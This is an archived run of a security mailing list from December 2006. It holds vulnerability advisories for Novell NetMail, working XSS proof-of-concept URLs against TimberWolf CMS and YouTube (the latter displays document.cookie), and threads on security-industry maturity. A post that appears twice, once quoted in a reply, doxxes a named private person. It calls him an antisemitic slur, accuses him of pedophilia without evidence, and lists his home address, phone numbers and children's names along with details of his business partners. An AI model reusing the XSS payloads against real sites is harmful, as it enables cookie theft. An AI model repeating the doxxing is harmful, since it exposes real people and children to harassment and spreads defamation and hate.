http://news.com.com/2061-10793_3-6144833.html 

n3tty!!! Missed you dude! 

[1] I am so happy you're back
[2] My happiness is very much
[3] same point as [1] but differently put
[4] Point that seems to be different from 1 and 3 but is not
 ..
..
[45] I'm soo happy!!

Where were you all these days? Whats up with the site your 'security' site?? And the list? And the yahoo world-domination plans? Geez!! so much to talk about.. 

Jeb 

PS : Whatever happened to Jeb Bush ? Doctors treated him?

   
"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein

"Cuanta estupidez en tan poco cerebro!"
On Saturday, December 23, 2006 11:31 AM, Jeb Osama wrote:
>>
>> From: n3td3v 
>>
>>
>> [introduction]
>> n3td3v is deeply sad at the new trend of morally accepted blackmail by
>> the security community, known better as a month of bugs.
>>
>> sincere researchers are coming forward more frequently to threaten
>> companies with a month of vendor bugs.
>>
>> because they are known to be sincere they are morally left off the
>> hook from what is known by n3td3v to be straight forward blackmail.
>>
>> blackmail is illegal, for this reason n3td3v wishes to make the
>> following recommendations:
>>
>> [1]bug a day for a month campaigns are blackmail on the part of the
>> researcher, all should be outlawed by government.
>>
>> [2]n3td3v calls on the government to make it highly illegal and
>> morally unacceptable to threaten a month of bugs for a vendor and its
>> customers
>>
>> [3]security researchers think its "fun" but all it amounts to is blackmail
>>
>> [4]all blackmail attempts shouldn't be dressed up as harmless fun
>>
>> [5]governments need to wake up and swiftly arrest those making month
>> of bug claims in the future
>>
>> [6]corporations and its consumers shouldn't be scared mongered and
>> threatened by individuals
>>
>> [7]researchers shouldn't use their real name or real place of
>> employment and expect exclusion from legal action against blackmail
>>
>> [8]researchers shouldn't be allowed to profit or gain career
>> opportunities by such claims to action by the researcher
>>
>> [9]researchers should be taken into custody, questioned and have their
>> hardware obtained for forensic analysis before a month of bugs is due
>> to start
>>
>> [10]individuals threatening to carry out a month of bugs shouldn't be
>> labelled as "security researchers" by the media and security experts
>>
>> [11]such individuals should be clearly labelled as "criminals",
>> "malicious attackers" and "blackhats", no matter what other "friendly"
>> or "useful" research they've carried out in the past.
>>
>> [media dork reference]
>> http://news.com.com/2061-10793_3-6144833.html
>
>Date: Sat, 23 Dec 2006 23:01:15 +0530
>From: Jeb Osama
>To: full-disclosure at lists.grok.org.uk
>Subject: Re: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
>
>n3tty!!! Missed you dude!
>
>[1] I am so happy you're back
>[2] My happiness is very much
>[3] same point as [1] but differently put
>[4] Point that seems to be different from 1 and 3 but is not
>..
>..
>[45] I'm soo happy!!
>
>Where were you all these days? Whats up with the site your 'security' site??
>And the list? And the yahoo world-domination plans? Geez!! so much to talk
>about..
>
>Jeb
>
>PS : Whatever happened to Jeb Bush ? Doctors treated him?
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061223/05a6db7e/attachment.html 

From labs-no-reply at idefense.com  Sun Dec 24 02:07:53 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Sat, 23 Dec 2006 21:07:53 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.23.06: Novell
 NetMail IMAPD subscribe Buffer Overflow Vulnerability
Message-ID: <458DE0F9.106@idefense.com>

Novell NetMail IMAPD subscribe Buffer Overflow Vulnerability

iDefense Security Advisory 12.23.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 23, 2006

I. BACKGROUND

Novell NetMail is an e-mail and calendar system that is based on standard
Internet protocols.

More information can be found at the vendors site:

http://www.novell.com/products/netmail/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Novell Inc.'s
NetMail IMAP daemon allows authenticated attackers to execute arbitrary
code with the privileges of the underlying user.

Once logged in, attackers can execute the "subscribe" command with an
overly long argument string to overflow a stack based buffer.

III. ANALYSIS

Exploitation allows authenticated remote attackers to execute arbitrary
code with the privileges of the underlying user.

IV. DETECTION

iDefense has confirmed the existence of the vulnerability in version 3.52d
of Novell NetMail.  It is suspected that earlier versions of NetMail are
also affected.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability in version 3.52e FTF2 of NetMail.
For more information consult Novell TID 3717068.  This document is
available at the following link.

http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3717068&sliceId=SAL_Public&dialogID=22219381&stateId=0%200%2022225106

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

10/10/2006  Initial vendor notification
10/11/2006  Initial vendor response
12/23/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by CIRT.DK.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.



From labs-no-reply at idefense.com  Sun Dec 24 02:07:59 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Sat, 23 Dec 2006 21:07:59 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.23.06: Novell
 Netmail IMAP append Denial of Service Vulnerability
Message-ID: <458DE0FF.3040900@idefense.com>

Novell Netmail IMAP append Denial of Service Vulnerability

iDefense Security Advisory 12.23.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 23, 2006

I. BACKGROUND

Novell NetMail is an e-mail and calendar system that is based on standard
Internet protocols.

More information can be found at the vendors site:

http://www.novell.com/products/netmail/

II. DESCRIPTION

Remote exploitation of a Denial of Service vulnerability in Novell Netmail
3.52 could allow an authenticated attacker the ability to crash the imapd
server.

Novell NetMail can be made to crash by sending an APPEND command with a
single '(' character as an argument.

III. ANALYSIS

This vulnerability is limited to a DoS only condition and requires
authentication in order to exploit it.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the IMAPD
server of Novell NetMail 3.52d and 3.52e. Older versions are suspected to
be vulnerable as well.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability in version 3.52e FTF2 of NetMail.
For more information consult Novell TID 3717068.  This document is
available at the following link.

http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3717068&sliceId=SAL_Public&dialogID=22219381&stateId=0%200%2022225106

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

10/16/2006  Initial vendor notification
10/19/2006  Initial vendor response
12/23/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by CIRT.DK.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.



From pdp.gnucitizen at googlemail.com  Sat Dec 23 20:43:41 2006
From: pdp.gnucitizen at googlemail.com (pdp (architect))
Date: Sat, 23 Dec 2006 20:43:41 +0000
Subject: [Full-disclosure] new backframe release
Message-ID: <6905b1570612231243t2cb2bcack5dfe4aafa4a25185@mail.gmail.com>

just for Christmas, there is a new backframe release:
http://www.gnucitizen.org/backframe/
http://www.gnucitizen.org/projects/backframe/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



From zim at vegaa.de  Sun Dec 24 12:54:47 2006
From: zim at vegaa.de (Michael Zimmermann)
Date: Sun, 24 Dec 2006 13:54:47 +0100
Subject: [Full-disclosure] comparing information security to
	other	industries
In-Reply-To: 
References: 
Message-ID: <1166964887.5348.47.camel@k7.khidr.net>

Am Dienstag, den 19.12.2006, 12:16 -0800 schrieb KT:
> How do we compare to other industries like construction, engineering,
> finance? What I am trying to figure out is how mature we are and how
> long will it take for to get stable?


Mature? Are you kidding? Computer security ist still mainly only
changing pampers after each incident.

That's because the common systems (software/hardware/social) are not
built for security but for money or fame.


All other industries you have mentioned are having established
procedures, rules and laws how to build their products and verify
the quality. Computer industry hasn't.

Just imagine a construction company who sells their houses only 
to people who sign a legally binding contract, that they accept
the house "as it it", without any guaranty that it is possible to
live in it. If the house breaks down over you and your family
you are elegible to get the money back - and no more. If burglars
celebrate parties in the house while you are at the office,
because it is well known that the backdoor-keys are identical
in all houses of that construction company and key-duplicates 
can be found wherever you find two homeless people doing a chat,
you are told to buy a separate product called "SecuyKeys"
(which costs at least 20% of the original price for the house).

You are not allowed to take the wallpapers from the wall and 
look behind to see how the house is constructed and get sued 
when you publish these so called "vulnerabilities" (which are 
in effect only the results of incomplete, greedy and careless
construction-work)


Just because companies are making money with computer 
security doesn't make it into an "industry".

Why not answer two questions for yourself: 

a)
are the computer systems at large nowadays more secure than 
- say - ten years ago?
b)
how much more money is spent for computer security since then?


The answers point directly to the net effect of what you call
an "industry".


And we - the IT-people - are responseable.


Greetings
Michael




From eaton.lists at gmail.com  Sun Dec 24 14:43:01 2006
From: eaton.lists at gmail.com (Brian Eaton)
Date: Sun, 24 Dec 2006 09:43:01 -0500
Subject: [Full-disclosure] comparing information security to other
	industries
In-Reply-To: <1166964887.5348.47.camel@k7.khidr.net>
References: 
	<1166964887.5348.47.camel@k7.khidr.net>
Message-ID: <242a0a8f0612240643j6f0560a0yf99705488121fbed@mail.gmail.com>

On 12/24/06, Michael Zimmermann  wrote:
> are the computer systems at large nowadays more secure than
> - say - ten years ago?

Some systems are.  But not because the software has gotten any better.
 Organizations have gotten better at defense-in-depth.

Consider patch management systems.  A decade ago, most companies
barely had one at all.  Today, companies are evaluating, verifying,
and pushing out patches within days of their release.  More networks
are isolated behind firewalls, and lots of workstations are using
host-based firewalls.  Even the low-end consumers have gotten better
at this: lots more people are using SOHO routers with firewalls
instead of a cable modem with a wide open internet connection.

The attackers have gotten better as well.  But even when the attackers
successfully exploit a new vulnerability, organizations are better
prepared to deal with the consequences.

You might see another codered type vulnerability in IIS, but there is
no way it would do as much damage as the original worm.

Regards,
Brian



From corrado.liotta at alice.it  Sun Dec 24 14:50:13 2006
From: corrado.liotta at alice.it (corrado.liotta at alice.it)
Date: Sun, 24 Dec 2006 15:50:13 +0100
Subject: [Full-disclosure] TimberWolf 1.2.2 vulnerable to XSS
Message-ID: 


-=[--------------------ADVISORY-------------------]=-
                                              
                        TimberWolf 1.2.2     
                                               
       Author: CorryL    [corryl80 at gmail.com]   
-=[----------------------------------------------------]=-


-=[+] Application:    TimberWolf
-=[+] Version:        1.2.2
-=[+] Vendor's URL:   http://cms.gamezrule.org/index.php
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck        
-=[+] Special Thanks: Merry Christmas for All, Thanks for all  #x0n3-h4ck member, 
                                  un saluto a tutti gli avolesi nel mondo.

..::[ Descriprion ]::..

TimberWolf is Powered by PHP and runs off an MySQL database.
It has quite a few distinctive features amongst others.

It is 100% Freeware.
It is 100% easy to skin, and use.
It is 100% of everything you need.

The Admin Control Panel is Very simple, whereas the site itself looks the opposite.


..::[ Bug ]::..

this software is vulnerable to a type of called bug
cross-site script, a remote attaker is able to exploit
this vulnerability to draw information 



..::[ Proof Of Concept ]::..

http://remote site/shownews.php?nid=>'>alert(1261667191)%3B


..::[ Workaround ]::..




..::[ Disclousure Timeline ]::..

[19/12/2006] - Vendor notification
[24/12/2006] - Public disclousure

**************
Registrati ad Alice Basic e scarica Alice Messenger, 
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!
Per maggiori informazioni vai su: 
http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061224/54218757/attachment.html 

From opticfiber at topsight.net  Sun Dec 24 16:48:27 2006
From: opticfiber at topsight.net (opticfiber)
Date: Sun, 24 Dec 2006 11:48:27 -0500
Subject: [Full-disclosure] Distributed Rainbow Table Project
Message-ID: <458EAF5B.6070506@topsight.net>

Since November the folks at theminouche.net & hashbreaker.com have been 
working on a distributed rainbowtable project using BOINC. The project 
finished it's testing phase and went public as of yesterday.

See http://www.topsight.net/ for more info on the project




From anvil at jumperz.net  Sun Dec 24 17:31:53 2006
From: anvil at jumperz.net (Kanatoko)
Date: Mon, 25 Dec 2006 02:31:53 +0900
Subject: [Full-disclosure] DNS-Pinning demo
Message-ID: <20061225022620.6A45.ANVIL@jumperz.net>


DNS-Pinning demo.
http://www.jumperz.net/index.php?i=2&a=1&b=7

Thanks to Martin Johns for the great article:
http://shampoo.antville.org/stories/1451301/

-- 
Kanatoko
Open Source WebAppFirewall
http://guardian.jumperz.net/



From pvnick at gmail.com  Sun Dec 24 19:00:18 2006
From: pvnick at gmail.com (Paul)
Date: Sun, 24 Dec 2006 14:00:18 -0500
Subject: [Full-disclosure] Merry Christmas Youtube! (XSS vuln)
Message-ID: 

The following URL will cause javascript to execute in the context of youtube

http://www.youtube.com/p.swf?video_id=eVFF98kNg8Q&eurl=&t=&iurl=javascript:alert('Javascript%20executed!\r\n\r\nLocation:
'%2bwindow.location%2b'\r\n\r\nCookie: '%2bdocument.cookie)

Cheers



From dexarouskies at munich.com  Sun Dec 24 22:26:31 2006
From: dexarouskies at munich.com (Dexa Rouskies)
Date: Sun, 24 Dec 2006 17:26:31 -0500
Subject: [Full-disclosure] [YST] Full Disclosure - Paul Robinette / Renetto
Message-ID: <20061224222631.D7A734780AA@ws1-5.us4.outblaze.com>

***********************************************************************
_         
_        | |         
 _   _  ___  _   _ _| |_ _   _| |__  _____     "gonna kick ur ass to     
| | | |/ _ \| | | (_   _) | | |  _ \| ___ |     the CURB"
| |_| | |_| | |_| | | |_| |_| | |_) ) ____|
 \__  |\___/|____/   \__)____/|____/|_____)    2006.
(____/        
_                       _        _                    
___ _| |_  ____ _____ _____ _| |_    _| |_ _____ _____ ____ 
 /___|_   _)/ ___) ___ | ___ (_   _)  (_   _) ___ (____ |    \
|___ | | |_| |   | ____| ____| | |_     | |_| ____/ ___ | | | |
(___/   \__)_|   |_____)_____)  \__)     \__)_____)_____|_|_|_|
***********************************************************************
FULL DISCLOSURE: Paul Robinette, Youtube evangelist, greedy jew, pedo

This document is the result of extensive research by the Youtube Street
Team.  The Youtube Street Team is privately funded in large part by
people such Lindsay Doty (Bravesgirl5), Andrea Davis (Violetkitty411),
Michael A. Michniewicz (Argent009), Dexarouskies, and ofcourse
Fattoothlessoveralls.

We are tired of this scum thinking he owns youtube.  The street team will
not stand for this.

HIS YOUTUBE PAGE: http://www.youtube.com/profile?user=renetto
Paul Robinette, also known as "Paul Robinett" without the e, is trying to
build a corporate empire around his youtube name.  The only way we can
help this is by letting people know the truth, the street team will not
stand for this.  He spends his time posting pictures of his underage
daughter to attract the attention of fellow pedophiles.

1.) Home
2.) Business

*********************************************
1.) Home
*********************************************
Robinette, Andrea & Paul
116 W Columbus St
Canal Winchester, OH 43110
614-920-9535

Paul resides in Columbus, Ohio, with his wife Andrea and their four
children, Chase, Gracie, Daisy, and Noah.

He doesn't really seem to give a damn whether or not his children are
placed in the public eye.
http://www.youtube.com/watch?v=_fWflNc6k08
http://www.youtube.com/watch?v=1ICJCx0BaV0
http://www.youtube.com/watch?v=du-y8XBSdsM 
http://www.youtube.com/watch?v=Clin5j0_z_0
http://www.youtube.com/watch?v=ZFv1Ig2XmkM
http://www.youtube.com/watch?v=8_oTweYTKDI
http://www.youtube.com/watch?v=G0t5XQhv4As
http://www.youtube.com/watch?v=j4U70n1C8d8
http://www.youtube.com/watch?v=X85YqHw43ZM
http://www.youtube.com/watch?v=73OewoBNvYU (rape neone?)

You can help by teaching him that the internet isn't a place for kids,
and pedophilia is no laughing matter.

*********************************************
2.) Business
*********************************************
He claims to have created this: http://www.paulrobinett.com/invention.php
aka www.renetto.com which links to => http://www.canopychair.com/.

a.) His business location ===
Paul Robinette owns candle store, ofcourse in an act of blatant
narcissism and grandiose, marketing his face.  It is located in the
shortnorth arts district (www.shortnorth.org) find more at
http://www.shortnorth.org/detail.asp?m=292

Paul Robinett
7 Buttles Avenue
Columbus, OH 43215
614-221-7005

http://maps.google.com/maps?f=q&hl=en&q=7+Buttles+Ave+Columbus,+OH+43215-1450&sll=37.0625,-95.677068&sspn=35.768112,71.103516&ie=UTF8&z=18&ll=39.976808,-83.003447&spn=0.002113,0.006099&t=h&om=1

b.) For folding chair ====
renetto llc
steve tinto (info at renetto.com)
+1.8887363886
Fax: +1.4802792318
8558 black star circle
columbia, MD 21045 US

Business partner

c.) T-shirts ====
Administrative Contact:
Fox, Daniel danielchristopherfox at gmail.com
1262 Bryden Rd.
columbus, Ohio 43205
United States
(614) 746-0333 Fax --

Business Partner

d.) Other projects ===
Kelsyus portable hammock (patent 6,966,084) under: Kelsyus, LLC 
(Virginia Beach, VA)  filed April 16, 2003

*********************************************
That is all.
*********************************************

-- 
___________________________________________________
Search for products and services at:
http://search.mail.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061224/6dc56aed/attachment.html 

From zim at vegaa.de  Mon Dec 25 00:07:30 2006
From: zim at vegaa.de (Michael Zimmermann)
Date: Mon, 25 Dec 2006 01:07:30 +0100
Subject: [Full-disclosure] comparing information security to
	other	industries
In-Reply-To: <242a0a8f0612240643j6f0560a0yf99705488121fbed@mail.gmail.com>
References: 
	<1166964887.5348.47.camel@k7.khidr.net>
	<242a0a8f0612240643j6f0560a0yf99705488121fbed@mail.gmail.com>
Message-ID: <1167005250.5050.53.camel@k7.khidr.net>

Hi Brian,

you answer from the viewpoint of somebody engaged in 
modern 'computer security'. But with the phrase 
"at large" I was meaning a more global view:

Two thirds of the PCs are estimated to contain
malware. We are so used to receive all kinds of
virusses, worms and trojans, that we NEED antivirus 
scanners and firewalls. Those defences are like
medicine, which you MUSt take - and the more medicine
you have to take, the more ill you are.

In the early 1980ies it was _unthinkable_ that a 
program would run on your systems, which you 
wouldn't know it existed and had installed for 
yourself. Nowadays it's the rare exception, when
a user knows what is running on his PC (and a
professional system admin, who knows every program
executing on his machine is also a rare thing, 
I think).

Complexity has grown, but our basic security
structures in hardware and software have have not.
Unix/Linux security is based on the classic Unix 
design (was it 1974 when it was published?), DOS
security is an unborn child while Windows security 
is not better than than of Linux. 

Why?

The Intel hardware for PCs was chosen on the basis 
of marketing thinking and not because it was 
technically better than it's alternative - nothing 
to say about security concerns. An executable stack
with decreasing addresses, unprotected memory and 
totally missing permission-scheme in the IBM PC and, 
and, and...

Marketing/money decision ruled the IT-Industry
since the first IBM PC was sold. Yet there have
existed better system- and hardware-designs
even before the IBM PC. Just to name two:
Motorola processors or the Multics OS.

Brian, IMO your argumentation is not a solution
to improve over-all security but is symptomatic 
for the lack of it.

A lot of patch-work and no broadly accepted
security concept. Only during the last years
that situation is changing slowly - but not
yet in the Windows realm. But a functioning 
PC security is needed IMO, at least I don't
want to live with a net, where hundred-
thousands of zombies can bring my server
down any moment or flood my MTA daily with
thousands of crap-email. These daily fights
may create a sort of dynamice equilibrium,
but are not what I call "security" or "stability".


Greetings
Michael



From evilrabbi at gmail.com  Mon Dec 25 03:47:25 2006
From: evilrabbi at gmail.com (evilrabbi)
Date: Sun, 24 Dec 2006 21:47:25 -0600
Subject: [Full-disclosure] Happy Holidays
Message-ID: 

Merry Christmas FD!
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061224/167d8b18/attachment.html 

From andre at operations.net  Mon Dec 25 11:18:49 2006
From: andre at operations.net (Andre Gironda)
Date: Mon, 25 Dec 2006 04:18:49 -0700
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: <4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>
References: 
	<200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
	<4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>
Message-ID: <2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>

On 12/19/06, coderman  wrote:
> ... What I am trying to figure out is how mature we are and how long will it take for to get stable?

how about never? http://www.cs.columbia.edu/~smb/papers/acm-predict.pdf

it is quite likely that the implications of risk in information
security is something we just have to live with for our lifetimes and
probably our childrens' lifetimes.

here's a disturbing question - when is law enforcement going to mature
to the point where there is no crime?



From SDALAN04 at smumn.edu  Mon Dec 25 16:46:37 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Mon, 25 Dec 2006 10:46:37 -0600
Subject: [Full-disclosure] [YST] Full Disclosure - Paul Robinette /
	Renetto
Message-ID: <2006122516463729794f356c@mail.smumn.edu>

 I see you have nothing better to do in Munich on Christmas day. Hmmm...... Didn't see anything wrong with the videos, maybe just a lil weird family, and a dad with a big ego. I have seen them type around even worked with a few. So, probably don't want to see stuff like this in my mail box, perhaps something more interesting?
  
 On Sunday, December 24, 2006  4:26 PM, Dexa Rouskies wrote:

Date: Sun, 24 Dec 2006 17:26:31 -0500
From: Dexa Rouskies
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] [YST] Full Disclosure - Paul Robinette / Renetto

  ***********************************************************************
                               _          
                     _        | |          
 _   _  ___  _   _ _| |_ _   _| |__  _____     "gonna kick ur ass to      
| | | |/ _ | | | (_   _) | | |  _ | ___ |     the CURB"
| |_| | |_| | |_| | | |_| |_| | |_) ) ____| 
 __  |___/|____/   __)____/|____/|_____)    2006.
(____/         
        _                       _        _                     
  ___ _| |_  ____ _____ _____ _| |_    _| |_ _____ _____ ____  
 /___|_   _)/ ___) ___ | ___ (_   _)  (_   _) ___ (____ |     
|___ | | |_| |   | ____| ____| | |_     | |_| ____/ ___ | | | |
(___/   __)_|   |_____)_____)  __)     __)_____)_____|_|_|_|
***********************************************************************
FULL DISCLOSURE: Paul Robinette, Youtube evangelist, greedy jew, pedo

This document is the result of extensive research by the Youtube Street Team.  The Youtube Street Team is privately funded in large part by people such Lindsay Doty (Bravesgirl5), Andrea Davis (Violetkitty411), Michael A. Michniewicz (Argent009), Dexarouskies, and ofcourse Fattoothlessoveralls.

We are tired of this scum thinking he owns youtube.  The street team will not stand for this.

HIS YOUTUBE PAGE: http://www.youtube.com/profile?user=renetto
Paul Robinette, also known as "Paul Robinett" without the e, is trying to build a corporate empire around his youtube name.  The only way we can help this is by letting people know the truth, the street team will not stand for this.  He spends his time posting pictures of his underage daughter to attract the attention of fellow pedophiles.

1.) Home
2.) Business

*********************************************
1.) Home
*********************************************
Robinette, Andrea & Paul
116 W Columbus St
Canal Winchester, OH 43110
614-920-9535

Paul resides in Columbus, Ohio, with his wife Andrea and their four children, Chase, Gracie, Daisy, and Noah.

He doesn't really seem to give a damn whether or not his children are placed in the public eye.
http://www.youtube.com/watch?v=_fWflNc6k08 
http://www.youtube.com/watch?v=1ICJCx0BaV0 
http://www.youtube.com/watch?v=du-y8XBSdsM  
http://www.youtube.com/watch?v=Clin5j0_z_0 
http://www.youtube.com/watch?v=ZFv1Ig2XmkM 
http://www.youtube.com/watch?v=8_oTweYTKDI 
http://www.youtube.com/watch?v=G0t5XQhv4As 
http://www.youtube.com/watch?v=j4U70n1C8d8 
http://www.youtube.com/watch?v=X85YqHw43ZM 
http://www.youtube.com/watch?v=73OewoBNvYU (rape neone?)

You can help by teaching him that the internet isn't a place for kids, and pedophilia is no laughing matter.

*********************************************
2.) Business
*********************************************
He claims to have created this: http://www.paulrobinett.com/invention.php aka www.renetto.com which links to => http://www.canopychair.com/.

a.) His business location ===
Paul Robinette owns candle store, ofcourse in an act of blatant narcissism and grandiose, marketing his face.  It is located in the shortnorth arts district (www.shortnorth.org) find more at http://www.shortnorth.org/detail.asp?m=292

Paul Robinett
7 Buttles Avenue
Columbus, OH 43215
614-221-7005

http://maps.google.com/maps?f=q&hl=en&q=7+Buttles+Ave+Columbus,+OH+43215-1450&sll=37.0625,-95.677068&sspn=35.768112,71.103516&ie=UTF8&z=18&ll=39.976808,-83.003447&spn=0.002113,0.006099&t=h&om=1

b.) For folding chair ====
renetto llc
steve tinto (info at renetto.com)
+1.8887363886
Fax: +1.4802792318
8558 black star circle
columbia, MD 21045 US

Business partner

c.) T-shirts ====
Administrative Contact:
Fox, Daniel danielchristopherfox at gmail.com
1262 Bryden Rd.
columbus, Ohio 43205
United States
(614) 746-0333 Fax -- 

Business Partner

d.) Other projects ===
Kelsyus portable hammock (patent 6,966,084) under: Kelsyus, LLC  (Virginia Beach, VA)  filed April 16, 2003

*********************************************
That is all.
*********************************************

  --        
"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein

"Cuanta estupidez en tan poco cerebro!"
On Sunday, December 24, 2006  4:26 PM, Dexa Rouskies wrote:
>
>Date: Sun, 24 Dec 2006 17:26:31 -0500
>From: Dexa Rouskies
>To: full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] [YST] Full Disclosure - Paul Robinette / Renetto
>
>***********************************************************************
>_         
>_        | |         
> _   _  ___  _   _ _| |_ _   _| |__  _____     "gonna kick ur ass to     
>| | | |/ _ \| | | (_   _) | | |  _ \| ___ |     the CURB"
>| |_| | |_| | |_| | | |_| |_| | |_) ) ____|
> \__  |\___/|____/   \__)____/|____/|_____)    2006.
>(____/        
>_                       _        _                    
>___ _| |_  ____ _____ _____ _| |_    _| |_ _____ _____ ____ 
> /___|_   _)/ ___) ___ | ___ (_   _)  (_   _) ___ (____ |    \
>|___ | | |_| |   | ____| ____| | |_     | |_| ____/ ___ | | | |
>(___/   \__)_|   |_____)_____)  \__)     \__)_____)_____|_|_|_|
>***********************************************************************
>FULL DISCLOSURE: Paul Robinette, Youtube evangelist, greedy jew, pedo
>
>This document is the result of extensive research by the Youtube Street
>Team.  The Youtube Street Team is privately funded in large part by
>people such Lindsay Doty (Bravesgirl5), Andrea Davis (Violetkitty411),
>Michael A. Michniewicz (Argent009), Dexarouskies, and ofcourse
>Fattoothlessoveralls.
>
>We are tired of this scum thinking he owns youtube.  The street team will
>not stand for this.
>
>HIS YOUTUBE PAGE: http://www.youtube.com/profile?user=renetto
>Paul Robinette, also known as "Paul Robinett" without the e, is trying to
>build a corporate empire around his youtube name.  The only way we can
>help this is by letting people know the truth, the street team will not
>stand for this.  He spends his time posting pictures of his underage
>daughter to attract the attention of fellow pedophiles.
>
>1.) Home
>2.) Business
>
>*********************************************
>1.) Home
>*********************************************
>Robinette, Andrea & Paul
>116 W Columbus St
>Canal Winchester, OH 43110
>614-920-9535
>
>Paul resides in Columbus, Ohio, with his wife Andrea and their four
>children, Chase, Gracie, Daisy, and Noah.
>
>He doesn't really seem to give a damn whether or not his children are
>placed in the public eye.
>http://www.youtube.com/watch?v=_fWflNc6k08
>http://www.youtube.com/watch?v=1ICJCx0BaV0
>http://www.youtube.com/watch?v=du-y8XBSdsM 
>http://www.youtube.com/watch?v=Clin5j0_z_0
>http://www.youtube.com/watch?v=ZFv1Ig2XmkM
>http://www.youtube.com/watch?v=8_oTweYTKDI
>http://www.youtube.com/watch?v=G0t5XQhv4As
>http://www.youtube.com/watch?v=j4U70n1C8d8
>http://www.youtube.com/watch?v=X85YqHw43ZM
>http://www.youtube.com/watch?v=73OewoBNvYU (rape neone?)
>
>You can help by teaching him that the internet isn't a place for kids,
>and pedophilia is no laughing matter.
>
>*********************************************
>2.) Business
>*********************************************
>He claims to have created this: http://www.paulrobinett.com/invention.php
>aka www.renetto.com which links to => http://www.canopychair.com/.
>
>a.) His business location ===
>Paul Robinette owns candle store, ofcourse in an act of blatant
>narcissism and grandiose, marketing his face.  It is located in the
>shortnorth arts district (www.shortnorth.org) find more at
>http://www.shortnorth.org/detail.asp?m=292
>
>Paul Robinett
>7 Buttles Avenue
>Columbus, OH 43215
>614-221-7005
>
>http://maps.google.com/maps?f=q&hl=en&q=7+Buttles+Ave+Columbus,+OH+43215-1450&sll=37.0625,-95.677068&sspn=35.768112,71.103516&ie=UTF8&z=18&ll=39.976808,-83.003447&spn=0.002113,0.006099&t=h&om=1
>
>b.) For folding chair ====
>renetto llc
>steve tinto (info at renetto.com)
>+1.8887363886
>Fax: +1.4802792318
>8558 black star circle
>columbia, MD 21045 US
>
>Business partner
>
>c.) T-shirts ====
>Administrative Contact:
>Fox, Daniel danielchristopherfox at gmail.com
>1262 Bryden Rd.
>columbus, Ohio 43205
>United States
>(614) 746-0333 Fax --
>
>Business Partner
>
>d.) Other projects ===
>Kelsyus portable hammock (patent 6,966,084) under: Kelsyus, LLC 
>(Virginia Beach, VA)  filed April 16, 2003
>
>*********************************************
>That is all.
>*********************************************
>
>-- 
>___________________________________________________
>Search for products and services at:
>http://search.mail.com
>
>

